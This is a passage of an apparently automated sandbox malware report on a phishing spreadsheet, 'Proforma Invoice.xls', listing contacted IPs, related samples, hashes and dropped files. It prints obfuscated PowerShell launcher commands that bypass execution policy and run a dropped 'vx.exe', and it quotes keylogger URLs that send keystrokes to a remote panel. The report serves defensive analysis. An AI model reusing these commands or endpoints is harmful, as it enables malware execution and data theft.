                                                                                                                                            http://status.rapidssl.com0powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
202.92.6.10 | unknown | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | false
104.22.1.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 320373
Start date: 19.11.2020
Start time: 10:03:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Proforma Invoice.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.expl.evad.winXLS@16/20@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 168.61.161.212, 52.109.76.6, 52.109.12.21, 52.109.76.33, 52.147.198.201, 23.54.113.104, 51.104.146.109, 8.248.99.254, 8.248.115.254, 8.253.145.105, 8.238.85.126, 8.250.159.254, 20.54.26.129, 23.10.249.43, 23.10.249.26, 52.155.217.156
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                            Simulations

Behavior and APIs

Time      Type             Description
10:04:59  API Interceptor  241x Sleep call for process: powershell.exe modified

                                                                                                                                            Joe Sandbox View / Context

IPs

Match         Associated Sample Name / URL                                      Detection  Context
202.92.6.10   Invoice.xlsm                                                      malicious  shopphongtinh.com/client.exe
202.92.6.10   SA Covid-19 Funding Connection.xlsm                               malicious  shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
202.92.6.10   invoice.exe                                                       malicious  shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
202.92.6.10   http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II  malicious  thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/
104.22.1.232  http://cutt.ly/                                                   malicious  cutt.ly/

                                                                                                                                            Domains


                                                                                                                                            ASN

                                                                                                                                            • 103.207.39.83
                                                                                                                                            SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            detail-information.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            executed.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            _000819.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81
                                                                                                                                            _000822.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81
                                                                                                                                            _000819.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81

JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Context
1099008FEDEX_090887766.xls | Detection: malicious | Context: 104.22.1.232
quotation_0087210_pdf.exe | Detection: malicious | Context: 104.22.1.232
23692 ANRITSU PROBE po 29288.exe | Detection: malicious | Context: 104.22.1.232
PO #5618896.gz.exe | Detection: malicious | Context: 104.22.1.232
bGtm3bQKUj.exe | Detection: malicious | Context: 104.22.1.232
https://greatdownloadplace.net/estate/formated/xlsc/Setup_v177.exe | Detection: malicious | Context: 104.22.1.232
BlueJeansInstaller.exe | Detection: malicious | Context: 104.22.1.232
JmuEmJ4T4r5bc8S.exe | Detection: malicious | Context: 104.22.1.232
List Of Orders.exe | Detection: malicious | Context: 104.22.1.232
Status____201711.gz.exe | Detection: malicious | Context: 104.22.1.232
Documento relativo al carico e alla spedizione del cliente_italy2020.exe | Detection: malicious | Context: 104.22.1.232
b095b966805abb7df4ffddf183def880.exe | Detection: malicious | Context: 104.22.1.232
SIN029088.xls | Detection: malicious | Context: 104.22.1.232
Request for Quote_PDF.vbs | Detection: malicious | Context: 104.22.1.232
01_file.exe | Detection: malicious | Context: 104.22.1.232
aguhvLvn.exe | Detection: malicious | Context: 104.22.1.232
BlueJeans.2.25.11u.msi | Detection: malicious | Context: 104.22.1.232
2B027105A0C3.exe | Detection: malicious | Context: 104.22.1.232
SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm | Detection: malicious | Context: 104.22.1.232
SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm | Detection: malicious | Context: 104.22.1.232

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\858DE975-BAE2-4804-817A-43A69FCAFAEC
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 129952
Entropy (8bit): 5.378340809923203
Encrypted: false
SSDEEP: 1536:ZcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:zmQ9DQW+zBX8u
MD5: 8F02A3BC24B652B81AC3A111979B1458
SHA1: E256D984F09C492E7B7EEDF9310C07BCD0BE7BC5
SHA-256: 0103F0ED21E5390AC47E6C1F72B3B5539FC04CE1DD47480F9B7A252846655E5F
SHA-512: 9D94002CF7614C115C27B6B5AAD0A3A124E246B0ECB8844AB3B0A0E68EE7211DF6BC1BEFBED93D61133D785AF7453B2440C6436284AE7C45C3A68D418B6ACE0E
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T09:04:15">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.8968676994158
Encrypted: false
SSDEEP: 96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5: 36DE9155D6C265A1DE62A448F3B5B66E
SHA1: 02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256: 8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
SHA-512: C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 19908
Entropy (8bit): 5.574087613065968
Encrypted: false
SSDEEP: 384:GtkcGhGjYNQPE9v/6S0naulUA8p7Y9wSJ3AY+PJWtHJynL6Rr:hlNgoaTaulUA8ZcAhmIn2p
MD5: C595F5692BC2EEB8CAE7E81B59DC5FA2
SHA1: 5CA8C7C338EBD5DB722C5BADBF514FB5C19A5028
SHA-256: 9364852F833E20EC7E3DC79B49B31E9FF46AD9A802D3BA25204E06C0D0B4E540
SHA-512: 679F5B1364707201D799BA4BF2F20DDE9C1D48D75E95FD2309745235E783681969D3428B9A09BBCA7567EF0A0A3DC22624AAA1712562C63A39DA34B1F5B19789
Malicious: false
Preview: @...e..........."...........k.[.....a.j...R..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\E2B10000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 59432
Entropy (8bit): 7.870305841685203
Encrypted: false
SSDEEP: 768:QbiEo/K2LJR7mWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTp:PEo/K2V9mSb4wjE7zF0Rhdv1hQzMrTp
MD5: 93D36185F412830AA74DE8CBFC9F87A6
SHA1: 0E5F84D96DAA4313333C6DE412397C7732724C46
SHA-256: 9A49D18BF5A4C94DADE9B09DCE9218995C8AC6E806215544601BDBE0ADE247BF
SHA-512: 5DA8C49DAFBF16EE189023A868F173C00808F727BB6FB55F483450C0D356A4B0750EA3364A55F78BDFB28D2C79174AC9B56B0D788DA9C8E62A06338062C06C2F
Malicious: false
Preview: .TKO.0..#...|]..{@+....Y...0...._.Mi.=.4....\".......V.TK.I{.s>b.:.v.=...Y.28..;l......8.......5..9\..d........|...7.E...9._....et...M..q.O&W.+..8.n.?.{E.a..|..;.S.>! ..%d.M,..6.~6...r.w.?..{.".4..1.....SL...'ea.B9...{.=..U&j....|... VF<...z...I..q%..."fnAF..`j....:....Ih.M.<?E...X..J`...J.........)D..Y...>2.c....`.[.h..S^.LG...h7.C.-DT.s...v...|......_.{OtH.....h"E<=..=_.u ".Y..w..V......2/..............PK..........!..._.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hkfqyz4.u1o.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mgeshrs.33b.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hk3mg0dq.jyh.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgv4klnb.wdl.psm1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pn5u0vvk.hhn.ps1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdoqjdn2.pcb.ps1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Nov 19 17:04:17 2020, atime=Thu Nov 19 17:04:17 2020, length=8192, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):904
                                                                                                                                            Entropy (8bit):4.6219904722378455
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8QO2tCXUyuElPCH2AxTpbFiYP8jsF+WrjAZ/2bDYeLC5Lu4t2Y+xIBjKZm:8QhtlxVbFzTAZiDC87aB6m
                                                                                                                                            MD5:7EC36BE39E11913C1072FB0E229EBA18
                                                                                                                                            SHA1:6F34ECE8BB3681EC6863EB87A90E6EB3A090CC2B
                                                                                                                                            SHA-256:0FC6D55651CE9B8904669720A5F206F6FCDB7821053A039DB5348167C94CC193
                                                                                                                                            SHA-512:DF2596255436129B30CBD269D0E45972369E83ED75253F7EE6490891D1AAFA889F7514881C9DD25A751C3429937D282780759ED046117DEA08EB0B3DFEA79C37
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: L..................F........N....-.....e....<'.e..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQx.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.sQx......S....................7.2.h.a.r.d.z.....~.1.....sQ....Desktop.h.......Ny.sQ.......Y..............>......d..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......581804...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.xls.LNK
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Thu Nov 19 17:04:17 2020, atime=Thu Nov 19 17:04:17 2020, length=80896, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2170
                                                                                                                                            Entropy (8bit):4.7030863853110985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:82xVbFcWsFt1Aojg6tdDMi7aB6my2xVbFcWsFt1Aojg6tdDMi7aB6m:8kFZSteoj5t+zB6pkFZSteoj5t+zB6
                                                                                                                                            MD5:F24AA8F4544598390C432FB58270FE7B
                                                                                                                                            SHA1:6AFCADA51E56B4C0E475710249D9097B7D452EED
                                                                                                                                            SHA-256:A7933D4111C49361075E237526A8ECC27908A5C1DA775CB34A945E50876ACAC4
                                                                                                                                            SHA-512:354B7D2E2E94AC751548F8836B77EA004943DBB3FCCE417462B19DC7C99B81B843FAC377C8DE81B7241EA38A604111855FC4E3133C188C51EAA2208BC78E4B57
                                                                                                                                            Malicious:true
                                                                                                                                            Preview: L..................F.... .......:...<'.e.......f.....<...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQx.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.sQx......S....................7.2.h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.sQx......Y..............>....... .D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....sQ.. .PROFOR~1.XLS..Z......>QvxsQ......h.........................P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Proforma Invoice.xls..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.........:..,.LB.)...As...`.......X.......581804...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):113
                                                                                                                                            Entropy (8bit):4.716833640370117
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:oyBVomMQDMILGMXp1taQILGMXp1mMQDMILGMXp1v:dj6GKgBafKgPGKgL
                                                                                                                                            MD5:2C06916EAD99D0511880A6240B912B1D
                                                                                                                                            SHA1:E5DFBD0D7F8F28B7289C207205D2B25D1DE98798
                                                                                                                                            SHA-256:5A89C7DB3201F33EF0B673E3C18F053D7BF74497A29E4877FF9337702207B8FC
                                                                                                                                            SHA-512:22739F4073223B02C58FB1A3D0F46BFB0C846B6CDC9A5449200C83D0EA7DFC49BB7CCBE278AB0744706540F731D69FB64BF3F5D5EF1F51D3430B43CDFCFFB219
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: Desktop.LNK=0..[xls]..Proforma Invoice.xls.LNK=0..Proforma Invoice.xls.LNK=0..[xls]..Proforma Invoice.xls.LNK=0..
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.SgatlcVc.20201119100423.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3478
                                                                                                                                            Entropy (8bit):5.273117445548069
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BZKhiNP3qDo1ZLZDhiNP3qDo1Z3qzvAzuazuaz+UZ+:50Avkuuuu+r
                                                                                                                                            MD5:970B8571A505AD9FE4D16302EDB33A1D
                                                                                                                                            SHA1:A550790EF8BF7E5D1628145AFD3804029D51FE85
                                                                                                                                            SHA-256:EF2B29C449A852320A58012D161BEC520D902BCF4BB4EE4AC49703B82AB61562
                                                                                                                                            SHA-512:D95D048562A951FCA5477DAF44D2222F8B9FB48F62950E7CB441983469B18C76666D5FD2C5809A8C2B663F02C31F168AC8CDC12A99785925B0C9E7AFD805E74A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100447..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100447..**********************..PS>stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe..**********************..Windows PowerShell transcript start..Start time: 20201119100547..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Applicatio
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.jfIwIQN1.20201119100422.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3265
                                                                                                                                            Entropy (8bit):5.393768869946091
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BZLhiNXqDo1Z0ZwfhiNXqDo1ZqQYwZwZaZFZuE:udzqqkGE
                                                                                                                                            MD5:18791271DF6BDC2025F1877A888E4301
                                                                                                                                            SHA1:BC0C8AA061FAF0B249ACA4774EC7653CF86FFAB7
                                                                                                                                            SHA-256:5B001FC9730AEBF2D060089FA2503EDE24CE3A689D49F7891F00008A2CAAEF88
                                                                                                                                            SHA-512:E52847EE8ABCCBE95628F77BBE09C2030812E501C32148B7D3F3D658041AF43102E43168FC205D9262BF12B3843E250D53970C8DA9B56440D85BB43A03A1ED28
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100446..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 20; Move-Item vx.exe -Destination ${enV`:appdata}..Process ID: 4804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100446..**********************..PS>stARt`-slE`Ep 20; Move-Item vx.exe -Destination ${enV`:appdata}..**********************..Windows PowerShell transcript start..Start time: 20201119100533..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.sxhBoU5o.20201119100421.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3291
                                                                                                                                            Entropy (8bit):5.453735252412667
                                                                                                                                            Encrypted:false
